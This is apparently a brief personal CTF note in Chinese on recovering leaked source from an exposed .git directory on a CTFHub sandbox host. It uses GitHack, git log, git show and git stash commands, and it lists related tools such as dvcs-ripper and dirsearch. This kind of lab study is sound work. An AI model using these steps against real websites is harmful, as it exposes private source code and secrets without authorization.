1.工具下载
所需工具:GitHack,下载地址:github。
使用GitHack还需要安装git,Python2。
git的安装在GitHack上有说明(window上直接下载安装使用就可以/linux上直接命令安装就可以)
python2下载地址:python
2.泄露信息查看
//ctfhub上的链接
//例如:python GitHack.py http://challenge-46ed068223ada74b.sandbox.ctfhub.com:10800/.git/
python GitHack.py http://"URL"/.git/
cd "GitHack"安装目录下的dist文件夹下。
2.1查看log日志:
git log --all
//例如: git show ca7ef5b6056253c6203644a8372ea4ce1e7a7e90
git show "对应的commit"
2.2查看stash信息:
git stash list
查找对应提交:
//0可填入提交对应的数值
//例如 git stash show -p stash@{0}
git stash show -p stash@{0}
其它:
GitHacker
dvcs-ripper
dirsearch
个人纪录,后续有新的内容再进行补充。